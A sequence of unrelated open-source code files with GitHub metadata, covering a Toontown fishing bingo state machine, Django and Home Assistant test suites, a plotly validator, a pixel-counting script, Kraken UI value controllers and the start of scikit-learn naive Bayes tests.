        self.notify.debug('enterReward: Enter Reward State')
        if self.card:
            self.card.setBingo()
            self.card.removeGame()
            self.card.setGameOver(TTLocalizer.FishBingoVictory)
        localToonSpot = self.pond.getLocalToonSpot()
        if localToonSpot:
            localToonSpot.setJarAmount(self.jackpot)
            self.jackpot = 0

    def filterReward(self, request, args):
        if request == 'WaitCountdown':
            return (request, args)
        elif request == 'Intermission':
            return (request, args)
        elif request == 'CloseEvent':
            return 'CloseEvent'
        elif request == 'Off':
            return 'Off'
        else:
            self.notify.debug('filterOff: Invalid State Transition from Reward to %s' % request)

    def exitReward(self):
        self.notify.debug('exitReward: Exit Reward State')
        self.card.setGameOver('')

    def enterGameOver(self, timeStamp):
        self.notify.debug('enterGameOver: Enter GameOver State')
        self.card.setBingo()
        self.card.removeGame()
        self.card.setGameOver(TTLocalizer.FishBingoGameOver)

    def filterGameOver(self, request, args):
        if request == 'WaitCountdown':
            return (request, args)
        elif request == 'Intermission':
            return (request, args)
        elif request == 'CloseEvent':
            return 'CloseEvent'
        elif request == 'Off':
            return 'Off'
        else:
            self.notify.debug('filterOff: Invalid State Transition from GameOver to %s' % request)

    def exitGameOver(self):
        self.notify.debug('exitGameOver: Exit GameOver State')
        self.card.setGameOver('')
        self.card.resetGameTypeText()

    def enterIntermission(self, timeStamp):
        """Hourly break between games; show the next-game countdown."""
        self.notify.debug('enterIntermission: Enter Intermission State')
        if self.hasEntered:
            self.card.showNextGameTimer(TTLocalizer.FishBingoIntermission)
        self.notify.debug('enterIntermission: timestamp %s' % timeStamp[0])
        elapsedTime = globalClockDelta.localElapsedTime(timeStamp[0])
        self.notify.debug('enterIntermission: elapsedTime %s' % elapsedTime)
        waitTime = BingoGlobals.HOUR_BREAK_SESSION - elapsedTime
        self.notify.debug('enterIntermission: waitTime %s' % waitTime)
        self.card.startNextGameCountdown(waitTime)

    def filterIntermission(self, request, args):
        if request == 'WaitCountdown':
            return (request, args)
        elif request == 'Off':
            return 'Off'
        else:
            self.notify.warning('filterOff: Invalid State Transition from GameOver to %s' % request)

    def exitIntermission(self):
        self.notify.debug('enterIntermission: Exit Intermission State')

    def enterCloseEvent(self, timestamp):
        """Bingo event ended for the day: hide GUI, restore normal spots."""
        self.notify.debug('enterCloseEvent: Enter CloseEvent State')
        self.card.hide()
        self.pond.resetSpotGui()

    def filterCloseEvent(self, request, args):
        if request == 'Off':
            return 'Off'
        else:
            self.notify.warning('filterOff: Invalid State Transition from GameOver to %s' % request)

    def exitCloseEvent(self):
        self.notify.debug('exitCloseEvent: Exit CloseEvent State')
| {
"content_hash": "d813823abd65390688ef46243b699c6b",
"timestamp": "",
"source": "github",
"line_count": 355,
"max_line_length": 103,
"avg_line_length": 36.78591549295775,
"alnum_prop": 0.6378742629604105,
"repo_name": "silly-wacky-3-town-toon/SOURCE-COD",
"id": "73139ee726ca8ceef8fbe48abe0049a9e9ed20d3",
"size": "13059",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "toontown/fishing/DistributedPondBingoManager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "10249"
},
{
"name": "C",
"bytes": "1752256"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "5485400"
},
{
"name": "Emacs Lisp",
"bytes": "210083"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Makefile",
"bytes": "895"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "NSIS",
"bytes": "1009050"
},
{
"name": "Objective-C",
"bytes": "21821"
},
{
"name": "PLSQL",
"bytes": "10200"
},
{
"name": "Pascal",
"bytes": "4986"
},
{
"name": "Perl6",
"bytes": "30612"
},
{
"name": "Puppet",
"bytes": "259"
},
{
"name": "Python",
"bytes": "33566014"
},
{
"name": "Shell",
"bytes": "14642"
},
{
"name": "Tcl",
"bytes": "2084458"
}
],
"symlink_target": ""
} |
import datetime
from django.conf import settings
from django.test import TestCase
from timepiece import utils
from timepiece.tests import factories
from timepiece.reports.utils import generate_dates
class ReportsTestBase(TestCase):
    """Shared fixture base for timepiece report tests.

    Creates users, activities, paid-leave projects and a set of default
    billable/nonbillable projects, plus helpers for bulk-creating entries.
    """
    def setUp(self):
        super(ReportsTestBase, self).setUp()
        self.user = factories.User()
        self.user2 = factories.User()
        self.superuser = factories.Superuser()
        self.devl_activity = factories.Activity(billable=True)
        self.activity = factories.Activity()
        # Paid-leave projects must be registered in settings so reports
        # can separate leave time from project time.
        self.sick = factories.Project()
        self.vacation = factories.Project()
        settings.TIMEPIECE_PAID_LEAVE_PROJECTS = {
            'sick': self.sick.pk,
            'vacation': self.vacation.pk,
        }
        self.leave = [self.sick.pk, self.vacation.pk]
        # NOTE(review): p3 shares the display name '1' with p1 — looks
        # deliberate (name-collision coverage in reports) but confirm.
        self.p1 = factories.BillableProject(name='1')
        self.p2 = factories.NonbillableProject(name='2')
        self.p4 = factories.BillableProject(name='4')
        self.p3 = factories.NonbillableProject(name='1')
        self.p5 = factories.BillableProject(name='3')
        self.default_projects = [self.p1, self.p2, self.p3, self.p4, self.p5]
        self.default_dates = [
            utils.add_timezone(datetime.datetime(2011, 1, 3)),
            utils.add_timezone(datetime.datetime(2011, 1, 4)),
            utils.add_timezone(datetime.datetime(2011, 1, 10)),
            utils.add_timezone(datetime.datetime(2011, 1, 16)),
            utils.add_timezone(datetime.datetime(2011, 1, 17)),
            utils.add_timezone(datetime.datetime(2011, 1, 18)),
        ]
    def make_entries(self, user=None, projects=None, dates=None,
            hours=1, minutes=0):
        """Make several entries to help with reports tests"""
        # One entry per (project, date) pair; log_time is presumably
        # provided by a mixin/base outside this file — TODO confirm.
        if not user:
            user = self.user
        if not projects:
            projects = self.default_projects
        if not dates:
            dates = self.default_dates
        for project in projects:
            for day in dates:
                self.log_time(project=project, start=day,
                        delta=(hours, minutes), user=user)
    def bulk_entries(self, start=datetime.datetime(2011, 1, 2),
            end=datetime.datetime(2011, 1, 4)):
        # Daily entries for both users over [start, end]: 2h each for
        # user, 1h each for user2, across projects including sick leave.
        start = utils.add_timezone(start)
        end = utils.add_timezone(end)
        dates = generate_dates(start, end, 'day')
        projects = [self.p1, self.p2, self.p2, self.p4, self.p5, self.sick]
        self.make_entries(projects=projects, dates=dates,
                user=self.user, hours=2)
        self.make_entries(projects=projects, dates=dates,
                user=self.user2, hours=1)
    def check_generate_dates(self, start, end, trunc, dates):
        # Assert generate_dates yields exactly the expected calendar days.
        for index, day in enumerate(generate_dates(start, end, trunc)):
            if isinstance(day, datetime.datetime):
                day = day.date()
            self.assertEqual(day, dates[index].date())
| {
"content_hash": "c4bd778ec85606ea989a903a9f5e619f",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 77,
"avg_line_length": 40.888888888888886,
"alnum_prop": 0.6049592391304348,
"repo_name": "caktus/django-timepiece",
"id": "ce18eb5f33bc16c10617993930c258d0ca458c0d",
"size": "2944",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "timepiece/reports/tests/base.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "23745"
},
{
"name": "HTML",
"bytes": "235951"
},
{
"name": "JavaScript",
"bytes": "202697"
},
{
"name": "Python",
"bytes": "562382"
}
],
"symlink_target": ""
} |
import _plotly_utils.basevalidators
class YshiftValidator(_plotly_utils.basevalidators.NumberValidator):
    """Number validator for layout.annotation.yshift."""

    def __init__(self, plotly_name="yshift", parent_name="layout.annotation", **kwargs):
        # Respect a caller-supplied edit_type, defaulting otherwise.
        kwargs.setdefault("edit_type", "calc+arraydraw")
        super(YshiftValidator, self).__init__(
            plotly_name=plotly_name, parent_name=parent_name, **kwargs
        )
| {
"content_hash": "c3cf69cfaf4e6c7098b334344767cd4d",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 88,
"avg_line_length": 37.63636363636363,
"alnum_prop": 0.6328502415458938,
"repo_name": "plotly/plotly.py",
"id": "5633cad75994be08e97a0dc517dacc04e9e25cc4",
"size": "414",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/layout/annotation/_yshift.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
} |
"""Test the Smart Meter Texas config flow."""
import asyncio
from unittest.mock import patch
from aiohttp import ClientError
import pytest
from smart_meter_texas.exceptions import (
SmartMeterTexasAPIError,
SmartMeterTexasAuthError,
)
from homeassistant import config_entries, setup
from homeassistant.components.smart_meter_texas.const import DOMAIN
from homeassistant.const import CONF_PASSWORD, CONF_USERNAME
from tests.common import MockConfigEntry
TEST_LOGIN = {CONF_USERNAME: "test-username", CONF_PASSWORD: "test-password"}
async def test_form(hass):
    """Test we get the form."""
    await setup.async_setup_component(hass, "persistent_notification", {})
    flow = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": config_entries.SOURCE_USER}
    )
    assert flow["type"] == "form"
    assert flow["errors"] == {}

    auth_ok = patch("smart_meter_texas.Client.authenticate", return_value=True)
    setup_entry = patch(
        "homeassistant.components.smart_meter_texas.async_setup_entry",
        return_value=True,
    )
    with auth_ok, setup_entry as mock_setup_entry:
        outcome = await hass.config_entries.flow.async_configure(
            flow["flow_id"], TEST_LOGIN
        )
        await hass.async_block_till_done()

    assert outcome["type"] == "create_entry"
    assert outcome["title"] == TEST_LOGIN[CONF_USERNAME]
    assert outcome["data"] == TEST_LOGIN
    assert len(mock_setup_entry.mock_calls) == 1
async def test_form_invalid_auth(hass):
    """Test we handle invalid auth."""
    flow = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": config_entries.SOURCE_USER}
    )
    auth_failure = patch(
        "smart_meter_texas.Client.authenticate",
        side_effect=SmartMeterTexasAuthError,
    )
    with auth_failure:
        outcome = await hass.config_entries.flow.async_configure(
            flow["flow_id"], TEST_LOGIN
        )
    assert outcome["type"] == "form"
    assert outcome["errors"] == {"base": "invalid_auth"}
@pytest.mark.parametrize(
    "side_effect", [asyncio.TimeoutError, ClientError, SmartMeterTexasAPIError]
)
async def test_form_cannot_connect(hass, side_effect):
    """Test we handle cannot connect error."""
    flow = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": config_entries.SOURCE_USER}
    )
    with patch("smart_meter_texas.Client.authenticate", side_effect=side_effect):
        outcome = await hass.config_entries.flow.async_configure(
            flow["flow_id"], TEST_LOGIN
        )
    assert outcome["type"] == "form"
    assert outcome["errors"] == {"base": "cannot_connect"}
async def test_form_unknown_exception(hass):
    """Test base exception is handled."""
    flow = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": config_entries.SOURCE_USER}
    )
    with patch("smart_meter_texas.Client.authenticate", side_effect=Exception):
        outcome = await hass.config_entries.flow.async_configure(
            flow["flow_id"], TEST_LOGIN
        )
    assert outcome["type"] == "form"
    assert outcome["errors"] == {"base": "unknown"}
async def test_form_duplicate_account(hass):
    """Test that a duplicate account cannot be configured."""
    login = {"username": "user123", "password": "password123"}
    MockConfigEntry(
        domain=DOMAIN,
        unique_id="user123",
        data=login,
    ).add_to_hass(hass)

    with patch("smart_meter_texas.Client.authenticate", return_value=True):
        outcome = await hass.config_entries.flow.async_init(
            DOMAIN,
            context={"source": config_entries.SOURCE_USER},
            data=dict(login),
        )
    assert outcome["type"] == "abort"
    assert outcome["reason"] == "already_configured"
| {
"content_hash": "29b68328fb6b5227522342e36a84c66a",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 82,
"avg_line_length": 31.43089430894309,
"alnum_prop": 0.6497672012415934,
"repo_name": "kennedyshead/home-assistant",
"id": "246ae4edc7d1f34985e9746baca16da5ce81fc38",
"size": "3866",
"binary": false,
"copies": "4",
"ref": "refs/heads/dev",
"path": "tests/components/smart_meter_texas/test_config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "33970989"
},
{
"name": "Shell",
"bytes": "4900"
}
],
"symlink_target": ""
} |
import argparse
import sys
# 3rd Party Imports
from PIL import Image
from prettytable import PrettyTable
class PixelCount:
    """Counts the pixels of an image whose value in a chosen RGB channel
    meets or exceeds a threshold.
    """

    # Maps a channel letter to its index in the split image.
    channel_indexes = {
        'r': 0,
        'g': 1,
        'b': 2
    }

    def __init__(self, image_file, channel, threshold):
        """image_file: path or binary file object readable by PIL.
        channel: one of 'r', 'g', 'b'.
        threshold: minimum (inclusive) pixel value to count.
        """
        # Arguments
        self.image_file = image_file
        self.channel_letter = channel
        self.channel_num = self.channel_indexes[channel]
        self.threshold = threshold
        # Read image file into self.image
        self.image = Image.open(self.image_file)

    def count(self):
        """Split the image into channels and count the pixels at or above
        self.threshold in the selected channel (self.channel_num).

        Returns a dict with total_pixels, above_threshold_count and
        above_threshold_percentage (0.0 for an empty image rather than
        dividing by zero).
        """
        # Split image into R,G,B channels
        channels = self.image.split()
        # Get pixels as a vector (single dimension array)
        channel_data = channels[self.channel_num].getdata()
        total_pixels = len(channel_data)
        # Count pixels above the threshold in one pass.
        above_threshold_count = sum(
            1 for pixel in channel_data if pixel >= self.threshold)
        if total_pixels:
            above_threshold_percentage = \
                (float(above_threshold_count) / total_pixels) * 100
        else:
            above_threshold_percentage = 0.0
        # Return dictionary of values
        return {
            "total_pixels": total_pixels,
            "above_threshold_count": above_threshold_count,
            "above_threshold_percentage": above_threshold_percentage
        }
class PixelCountCLI:
    """ This class provides a command line interface for pixelcount
    """
    def main(self, input_args):
        """ The main method - this will be executed when pixelcount is run
        from the command line.

        input_args: argv-style list of arguments (without the program name).
        """
        # Deal with command line arguments
        parser = argparse.ArgumentParser()
        parser.add_argument('--channel', '-c', choices=['r', 'g', 'b'],
                            required=True)
        parser.add_argument('--threshold', '-t', type=int, required=True)
        parser.add_argument('--file', '-f', type=argparse.FileType('rb'),
                            required=True)
        args = parser.parse_args(input_args)
        # Initialise PixelCount
        pc = PixelCount(image_file=args.file,
                        channel=args.channel,
                        threshold=args.threshold)
        # Count!
        results = pc.count()
        # Print results in a table
        table = PrettyTable(["Item", "Value"])
        table.add_row(["Total Pixels", results["total_pixels"]])
        table.add_row(["Channel", pc.channel_letter])
        table.add_row(["Threshold", pc.threshold])
        table.add_row(["Pixels in channel %s Above Threshold" %
                       pc.channel_letter, results["above_threshold_count"]])
        table.add_row(["Above Threshold Percentage",
                       "%.2f%%" % results["above_threshold_percentage"]])
        # NOTE: Python 2 print statement — this module is Python 2 only.
        print table
# Entry point: run the PixelCount CLI when this module is executed directly.
if __name__ == '__main__':
    PixelCountCLI().main(sys.argv[1:])
| {
"content_hash": "8888012ef24ce3ab1025db0e7ebcacfd",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 76,
"avg_line_length": 31.939393939393938,
"alnum_prop": 0.5866540164452878,
"repo_name": "hughsaunders/pixelcount",
"id": "fd367d9b7ccc147adfe5b32c280d828a6ed8a865",
"size": "3212",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pixelcount/pixelcount.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2745"
}
],
"symlink_target": ""
} |
from kraken.ui.Qt import QtGui, QtWidgets, QtCore
from undo_redo_manager import UndoRedoManager, Command
class ValueChangeCommand(Command):
    """Undoable command that records a value change on a ValueController.

    The controller's current value is captured at construction time so
    that undo() can restore it later.
    """
    def __init__(self, valueController, newValue):
        super(ValueChangeCommand, self).__init__()
        self._valueController = valueController
        # Snapshot the value before the change so undo() can restore it.
        self.oldValue = self._valueController.getValue()
        self.newValue = newValue
    def shortDesc(self):
        # Human-readable label, e.g. for an undo-history listing.
        return "Value Change:'" + self._valueController.getName() + "'"
    def redo(self):
        # Apply the new value without pushing another undo entry.
        self._valueController._setValue_NoUndo(self.newValue)
    def undo(self):
        self._valueController._setValue_NoUndo(self.oldValue)
    def mergeWith(self, prevCommand):
        # Collapse consecutive changes to the same controller into a single
        # undo step.
        # NOTE(review): this copies prevCommand.newValue over self.newValue,
        # i.e. it treats *prevCommand* as carrying the value to keep --
        # confirm against UndoRedoManager's merge ordering that this is the
        # intended direction.
        if isinstance(prevCommand, ValueChangeCommand):
            if prevCommand._valueController == self._valueController:
                self.newValue = prevCommand.newValue
                self._valueController._setValue_NoUndo(self.newValue)
                return True
        return False
class ValueController(QtCore.QObject):
    """Base controller exposing a named, typed value with Qt change signals.

    Subclasses implement _setValue_NoUndo()/getValue(); setValue() routes
    changes through the undo/redo stack.
    """

    valueChanged = QtCore.Signal(object)
    editableChanged = QtCore.Signal(bool)
    optionChanged = QtCore.Signal(str)

    def __init__(self, name, dataType, editable=True, **kwargs):
        super(ValueController, self).__init__()
        self.name = name
        self.dataType = dataType
        self.editable = editable
        # Remaining keyword arguments become free-form options.
        self.options = kwargs

    def getName(self):
        """Return the controller name as a plain string."""
        return str(self.name)

    def getDataType(self):
        """Return the declared data type of the controlled value."""
        return self.dataType

    def setValue(self, value):
        """Change the value through the undo/redo stack (undoable)."""
        UndoRedoManager.getInstance().addCommand(
            ValueChangeCommand(self, value), invokeRedoOnAdd=True)

    def _setValue_NoUndo(self, value):
        # Subclass responsibility: apply the value without undo tracking.
        raise NotImplementedError()

    def getValue(self):
        # Subclass responsibility: produce the current value.
        raise NotImplementedError()

    def getOption(self, key, defaultValue=None):
        """Return option *key*, or *defaultValue* when absent."""
        return self.options.get(key, defaultValue)

    def hasOption(self, key):
        return key in self.options

    def setOption(self, key, value):
        """Store option *key* and notify listeners."""
        self.options[key] = value
        self.optionChanged.emit(key)

    def isEditable(self):
        return self.editable

    def setEditable(self, editable):
        """Update the editable flag and notify listeners."""
        self.editable = editable
        self.editableChanged.emit(editable)

    def _extractSimpleTypes(self, value):
        # NOTE(review): both branches return *value* unchanged, so this is
        # currently a pass-through; the RTVal unwrapping suggested by the
        # type check was apparently never implemented.
        simpleTypes = (
            'Boolean', 'UInt8', 'Byte', 'SInt8', 'UInt16', 'SInt16',
            'UInt32', 'Count', 'Index', 'Size', 'SInt32', 'Integer',
            'UInt64', 'DataSize', 'SInt64', 'Float32', 'Scalar',
            'Float64', 'String')
        if (str(type(value)) == "<type 'PyRTValObject'>"
                and self.dataType in simpleTypes):
            return value
        return value

    def emitValueChanged(self):
        """Re-emit valueChanged with the current value."""
        self.valueChanged.emit(self.getValue())
class MemberController(ValueController):
    """Controller bound to a named attribute (member) of an owner object."""

    def __init__(self, name, dataType, owner, editable=True, **kwargs):
        super(MemberController, self).__init__(name, dataType, editable, **kwargs)
        self.owner = owner

    def _setValue_NoUndo(self, value):
        # Write straight onto the owner's attribute, then notify listeners.
        setattr(self.owner, self.name, value)
        self.valueChanged.emit(self.getValue())

    def getValue(self):
        current = getattr(self.owner, self.name)
        return self._extractSimpleTypes(current)
class ElementController(ValueController):
    """Controller bound to a keyed/indexed element of a container owner."""

    def __init__(self, name, dataType, owner, editable=True, **kwargs):
        super(ElementController, self).__init__(name, dataType, editable, **kwargs)
        self.owner = owner

    def _setValue_NoUndo(self, value):
        # Store into the container under this controller's name/key.
        self.owner[self.name] = value
        self.valueChanged.emit(self.getValue())

    def getValue(self):
        element = self.owner[self.name]
        return self._extractSimpleTypes(element)
class GetterSetterController(ValueController):
    """Controller whose value is accessed through optional getter/setter
    callables, falling back to an internally stored value when absent."""

    def __init__(self, name, dataType, getter=None, setter=None, defaultValue=None, **kwargs):
        # Editable only when both accessors are supplied.
        super(GetterSetterController, self).__init__(
            name, dataType=dataType,
            editable=(getter is not None and setter is not None), **kwargs)
        self.getter = getter
        self.setter = setter
        self.value = defaultValue

    def _setValue_NoUndo(self, value):
        if self.setter is not None:
            self.setter(value)
        else:
            # No setter attached: keep the value locally.
            self.value = value
        self.valueChanged.emit(self.getValue())

    def getValue(self):
        raw = self.value if self.getter is None else self.getter()
        return self._extractSimpleTypes(raw)

    def setGetter(self, getter):
        """Attach a getter, refresh the cached value and notify."""
        self.getter = getter
        self.value = self.getter()
        self.valueChanged.emit(self.getValue())

    def setGetterSetter(self, getter, setter):
        """Attach both accessors, refresh value, editability and notify."""
        self.getter = getter
        self.setter = setter
        self.value = getter()
        self.setEditable(self.setter is not None)
        self.valueChanged.emit(self.getValue())
| {
"content_hash": "49c1523be0664f841266570f16024a9e",
"timestamp": "",
"source": "github",
"line_count": 191,
"max_line_length": 141,
"avg_line_length": 28.167539267015705,
"alnum_prop": 0.616728624535316,
"repo_name": "oculusstorystudio/kraken",
"id": "2f07d9eab62e6cb3e988a8cf936e5be80ad85ca6",
"size": "5445",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop_OSS",
"path": "Python/kraken/ui/HAppkit_Editors/core/value_controller.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AMPL",
"bytes": "136"
},
{
"name": "Batchfile",
"bytes": "2584"
},
{
"name": "CSS",
"bytes": "21033"
},
{
"name": "MAXScript",
"bytes": "521"
},
{
"name": "Mathematica",
"bytes": "4442959"
},
{
"name": "Python",
"bytes": "2841362"
},
{
"name": "Shell",
"bytes": "2689"
}
],
"symlink_target": ""
} |
import pickle
from io import BytesIO
import numpy as np
import scipy.sparse
from sklearn.datasets import load_digits, load_iris
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.externals.six.moves import zip
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_warns
from sklearn.naive_bayes import GaussianNB, BernoulliNB, MultinomialNB
# Data is just 6 separable points in the plane
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]])
y = np.array([1, 1, 1, 2, 2, 2])
# A bit more random tests
# (the fixed seed keeps these random fixtures reproducible across runs)
rng = np.random.RandomState(0)
X1 = rng.normal(size=(10, 3))
y1 = (rng.normal(size=(10)) > 0).astype(np.int)
# Data is 6 random integer points in a 100 dimensional space classified to
# three classes.
X2 = rng.randint(5, size=(6, 100))
y2 = np.array([1, 1, 2, 2, 3, 3])
def test_gnb():
    # Gaussian Naive Bayes classification.
    # This checks that GaussianNB implements fit and predict and returns
    # correct values for a simple toy dataset.
    clf = GaussianNB()
    y_pred = clf.fit(X, y).predict(X)
    assert_array_equal(y_pred, y)
    # predict_proba and predict_log_proba must agree: the log of one
    # equals the other (to 8 decimal places).
    y_pred_proba = clf.predict_proba(X)
    y_pred_log_proba = clf.predict_log_proba(X)
    assert_array_almost_equal(np.log(y_pred_proba), y_pred_log_proba, 8)
    # Test whether label mismatch between target y and classes raises
    # an Error
    # FIXME Remove this test once the more general partial_fit tests are merged
    assert_raises(ValueError, GaussianNB().partial_fit, X, y, classes=[0, 1])
def test_gnb_prior():
    # Test whether class priors are properly set.
    # X/y contain 3 samples per class, so the empirical prior is [0.5, 0.5].
    clf = GaussianNB().fit(X, y)
    assert_array_almost_equal(np.array([3, 3]) / 6.0,
                              clf.class_prior_, 8)
    clf.fit(X1, y1)
    # Check that the class priors sum to 1
    assert_array_almost_equal(clf.class_prior_.sum(), 1)
def test_gnb_sample_weight():
    """Test whether sample weights are properly used in GNB. """
    # Sample weights all being 1 should not change results
    sw = np.ones(6)
    clf = GaussianNB().fit(X, y)
    clf_sw = GaussianNB().fit(X, y, sw)
    assert_array_almost_equal(clf.theta_, clf_sw.theta_)
    assert_array_almost_equal(clf.sigma_, clf_sw.sigma_)
    # Fitting twice with half sample-weights should result
    # in same result as fitting once with full weights
    sw = rng.rand(y.shape[0])
    clf1 = GaussianNB().fit(X, y, sample_weight=sw)
    clf2 = GaussianNB().partial_fit(X, y, classes=[1, 2], sample_weight=sw / 2)
    clf2.partial_fit(X, y, sample_weight=sw / 2)
    assert_array_almost_equal(clf1.theta_, clf2.theta_)
    assert_array_almost_equal(clf1.sigma_, clf2.sigma_)
    # Check that duplicate entries and correspondingly increased sample
    # weights yield the same result
    ind = rng.randint(0, X.shape[0], 20)
    sample_weight = np.bincount(ind, minlength=X.shape[0])
    clf_dupl = GaussianNB().fit(X[ind], y[ind])
    clf_sw = GaussianNB().fit(X, y, sample_weight)
    assert_array_almost_equal(clf_dupl.theta_, clf_sw.theta_)
    assert_array_almost_equal(clf_dupl.sigma_, clf_sw.sigma_)
def test_gnb_neg_priors():
    """Test whether an error is raised in case of negative priors"""
    clf = GaussianNB(priors=np.array([-1., 2.]))
    assert_raises(ValueError, clf.fit, X, y)
def test_gnb_priors():
    """Test whether the class prior override is properly used"""
    # The expected probabilities below are the exact values for this toy
    # data under the supplied [0.3, 0.7] prior.
    clf = GaussianNB(priors=np.array([0.3, 0.7])).fit(X, y)
    assert_array_almost_equal(clf.predict_proba([[-0.1, -0.1]]),
                              np.array([[0.825303662161683,
                                         0.174696337838317]]), 8)
    assert_array_equal(clf.class_prior_, np.array([0.3, 0.7]))
def test_gnb_wrong_nb_priors():
    """ Test whether an error is raised if the number of prior is different
    from the number of class"""
    clf = GaussianNB(priors=np.array([.25, .25, .25, .25]))
    assert_raises(ValueError, clf.fit, X, y)
def test_gnb_prior_greater_one():
    """Test if an error is raised if the sum of prior greater than one"""
    clf = GaussianNB(priors=np.array([2., 1.]))
    assert_raises(ValueError, clf.fit, X, y)
def test_gnb_prior_large_bias():
    """Test if good prediction when class prior favor largely one class"""
    # With a 0.99 prior on class 2 the query point is predicted as class 2.
    clf = GaussianNB(priors=np.array([0.01, 0.99]))
    clf.fit(X, y)
    assert_equal(clf.predict([[-0.1, -0.1]]), np.array([2]))
def test_check_update_with_no_data():
    """ Test when the partial fit is called without any data"""
    # Create an empty array
    prev_points = 100
    mean = 0.
    var = 1.
    x_empty = np.empty((0, X.shape[1]))
    # An update with zero samples must leave mean and variance untouched.
    tmean, tvar = GaussianNB._update_mean_variance(prev_points, mean,
                                                   var, x_empty)
    assert_equal(tmean, mean)
    assert_equal(tvar, var)
def test_gnb_pfit_wrong_nb_features():
    """Test whether an error is raised when the number of feature changes
    between two partial fit"""
    clf = GaussianNB()
    # Fit for the first time the GNB
    clf.fit(X, y)
    # Partial fit a second time with an incoherent X
    assert_raises(ValueError, clf.partial_fit, np.hstack((X, X)), y)
def test_discrete_prior():
    # Test whether class priors are properly set.
    # y2 has 2 samples in each of its 3 classes.
    for cls in [BernoulliNB, MultinomialNB]:
        clf = cls().fit(X2, y2)
        assert_array_almost_equal(np.log(np.array([2, 2, 2]) / 6.0),
                                  clf.class_log_prior_, 8)
def test_mnnb():
    # Test Multinomial Naive Bayes classification.
    # This checks that MultinomialNB implements fit and predict and returns
    # correct values for a simple toy dataset.
    # The whole check runs twice: on dense input and on sparse CSR input.
    for X in [X2, scipy.sparse.csr_matrix(X2)]:
        # Check the ability to predict the learning set.
        clf = MultinomialNB()
        assert_raises(ValueError, clf.fit, -X, y2)
        y_pred = clf.fit(X, y2).predict(X)
        assert_array_equal(y_pred, y2)
        # Verify that np.log(clf.predict_proba(X)) gives the same results as
        # clf.predict_log_proba(X)
        y_pred_proba = clf.predict_proba(X)
        y_pred_log_proba = clf.predict_log_proba(X)
        assert_array_almost_equal(np.log(y_pred_proba), y_pred_log_proba, 8)
        # Check that incremental fitting yields the same results
        clf2 = MultinomialNB()
        clf2.partial_fit(X[:2], y2[:2], classes=np.unique(y2))
        clf2.partial_fit(X[2:5], y2[2:5])
        clf2.partial_fit(X[5:], y2[5:])
        y_pred2 = clf2.predict(X)
        assert_array_equal(y_pred2, y2)
        y_pred_proba2 = clf2.predict_proba(X)
        y_pred_log_proba2 = clf2.predict_log_proba(X)
        assert_array_almost_equal(np.log(y_pred_proba2), y_pred_log_proba2, 8)
        assert_array_almost_equal(y_pred_proba2, y_pred_proba)
        assert_array_almost_equal(y_pred_log_proba2, y_pred_log_proba)
        # Partial fit on the whole data at once should be the same as fit too
        clf3 = MultinomialNB()
        clf3.partial_fit(X, y2, classes=np.unique(y2))
        y_pred3 = clf3.predict(X)
        assert_array_equal(y_pred3, y2)
        y_pred_proba3 = clf3.predict_proba(X)
        y_pred_log_proba3 = clf3.predict_log_proba(X)
        assert_array_almost_equal(np.log(y_pred_proba3), y_pred_log_proba3, 8)
        assert_array_almost_equal(y_pred_proba3, y_pred_proba)
        assert_array_almost_equal(y_pred_log_proba3, y_pred_log_proba)
def check_partial_fit(cls):
    # fit() and a single equivalent partial_fit() call must produce the
    # same sufficient statistics (class and feature counts).
    clf1 = cls()
    clf1.fit([[0, 1], [1, 0]], [0, 1])
    clf2 = cls()
    clf2.partial_fit([[0, 1], [1, 0]], [0, 1], classes=[0, 1])
    assert_array_equal(clf1.class_count_, clf2.class_count_)
    assert_array_equal(clf1.feature_count_, clf2.feature_count_)
    # Splitting the same data across two partial_fit() calls must, too.
    clf3 = cls()
    clf3.partial_fit([[0, 1]], [0], classes=[0, 1])
    clf3.partial_fit([[1, 0]], [1])
    assert_array_equal(clf1.class_count_, clf3.class_count_)
    assert_array_equal(clf1.feature_count_, clf3.feature_count_)
def test_discretenb_partial_fit():
    # Nose-style generator test: yields one check per discrete NB class.
    for cls in [MultinomialNB, BernoulliNB]:
        yield check_partial_fit, cls
def test_gnb_partial_fit():
    # GaussianNB: fit() and partial_fit() on the same data must agree.
    clf = GaussianNB().fit(X, y)
